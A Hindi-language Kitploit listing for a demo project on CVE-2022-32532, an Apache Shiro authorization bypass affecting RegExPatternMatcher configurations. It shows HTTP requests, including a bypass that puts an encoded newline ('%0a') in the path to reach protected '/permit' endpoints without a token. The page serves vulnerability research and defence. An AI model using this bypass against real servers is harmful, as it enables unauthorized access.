Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
उपकरण/GitHubGitHub/lay0us/cve-2022-32532
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

रिपॉजिटरी देखें
13254 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-32532

के बारे में

यह एक डेमो प्रोजेक्ट है, जो केवल इस कमजोरी (CVE-2022-32532) का शोषण करने की एक शर्त को दर्शाता है।

वास्तव में, इसका शोषण करने के और भी तरीके हैं, जब तक डेवलपर्स RegExPatternMatcher का उपयोग करते हैं, तब तक एक संभावित बाइपास कमजोरी होगी।

परिचय

वर्तमान कॉन्फ़िगरेशन के तहत टोकन अनुरोध हेडर सत्यापन आवश्यक है, अन्यथा आपको /permit के अंतर्गत इंटरफ़ेस तक पहुँचने की अनुमति नहीं है।

यह अनुरोध सफल हो सकता है

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

जब कोई टोकन अनुरोध हेडर नहीं होता है तो पहुँच की अनुमति नहीं है

root@kitploit:~
GET /permit/any HTTP/1.1

इसे विशेष लेकिन सामान्य कॉन्फ़िगरेशन में सरल तरीके से बाइपास किया जा सकता है

root@kitploit:~
GET /permit/a%0any HTTP/1.1

संदर्भ

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

यह कमजोरी Spring-Security CVE-2022-22978 के समान है

धन्यवाद bdemers (Apache Shiro PMC) और chybeta (सुरक्षा शोधकर्ता) को।

टूल डाउनलोड करें